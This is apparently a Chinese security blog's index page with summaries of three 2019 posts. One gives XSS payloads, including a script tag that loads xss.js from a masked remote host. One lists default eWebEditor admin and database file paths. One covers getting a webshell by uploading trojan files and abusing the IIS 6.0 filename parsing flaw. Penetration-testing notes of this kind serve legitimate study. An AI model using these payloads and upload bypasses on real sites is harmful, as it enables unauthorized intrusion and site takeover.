摘要: (1)普通的XSS JavaScript注入<SCRIPT SRC=http://***/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://***/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号< 阅读全文
posted @ 2019-07-21 22:19 -Zad- 阅读(4379) 评论(0) 推荐(0) 编辑
摘要: 1、关键文件的名称和路径Admin_Login.asp 登录页面Admin_Default.asp 管理首页Admin_Style.aspAdmin_UploadFile.aspUpload.aspAdmin_ModiPwd.aspeWebEditor.aspdb/ewebeditor.mdb 默认 阅读全文
posted @ 2019-07-21 22:17 -Zad- 阅读(866) 评论(0) 推荐(0) 编辑
摘要: 【 拿shell 】1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞":1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls2.上传图片木马遇到拦截系统,连图片木马都上传不了,记事本打开图片木马 阅读全文
posted @ 2019-07-21 22:12 -Zad- 阅读(935) 评论(0) 推荐(1) 编辑
jQuery火箭图标返回顶部代码